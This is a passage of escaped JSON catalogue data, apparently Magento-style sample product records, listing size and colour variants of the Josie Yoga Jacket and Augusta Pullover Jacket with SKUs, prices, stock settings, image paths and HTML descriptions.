Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1188\":{\"sku\":\"WJ02-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-XL-Gray\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"1189\":{\"sku\":\"WJ02\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Jacket|Pullover|Lightweight|Soft Shell,material=Polyester|Spandex|CoolTech&trade;,pattern=Solid,climate=Indoor|Mild|Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ02-XS-Black,size=XS,color=Black|sku=WJ02-XS-Blue,size=XS,color=Blue|sku=WJ02-XS-Gray,size=XS,color=Gray|sku=WJ02-S-Black,size=S,color=Black|sku=WJ02-S-Blue,size=S,color=Blue|sku=WJ02-S-Gray,size=S,color=Gray|sku=WJ02-M-Black,size=M,color=Black|sku=WJ02-M-Blue,size=M,color=Blue|sku=WJ02-M-Gray,size=M,color=Gray|sku=WJ02-L-Black,size=L,color=Black|sku=WJ02-L-Blue,size=L,color=Blue|sku=WJ02-L-Gray,size=L,color=Gray|sku=WJ02-XL-Black,size=XL,color=Black|sku=WJ02-XL-Blue,size=XL,color=Blue|sku=WJ02-XL-Gray,size=XL,color=Gray\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Jacket|Pullover|Lightweight|Soft Shell\",\"material\":\"Polyester|Spandex|CoolTech&trade;\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Mild|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"1190\":{\"sku\":\"WJ03-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-XS-Blue\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1191\":{\"sku\":\"WJ03-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-XS-Orange\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1192\":{\"sku\":\"WJ03-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-XS-Red\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1193\":{\"sku\":\"WJ03-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-S-Blue\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1194\":{\"sku\":\"WJ03-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-S-Orange\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1195\":{\"sku\":\"WJ03-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Augusta Pullover Jacket-S-Red\",\"description\":\"<p>It\'s hard to be uncomfortable in the Augusta Pullover Jacket with &frac14; zip. With an incredibly soft fleece lining and textured outer fabric, it offers reliable protection from the elements and a cozy fit as well.<\\/p>\\n<p>&bull; Pink half-zip pullover. <br \\/>&bull; Front pouch pockets. <br \\/>&bull; Fold-down collar.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"augusta-pullover-jacket-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj03-red_alt1.jpg,\\/w\\/j\\/wj03-red_back.jpg\",\"image\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\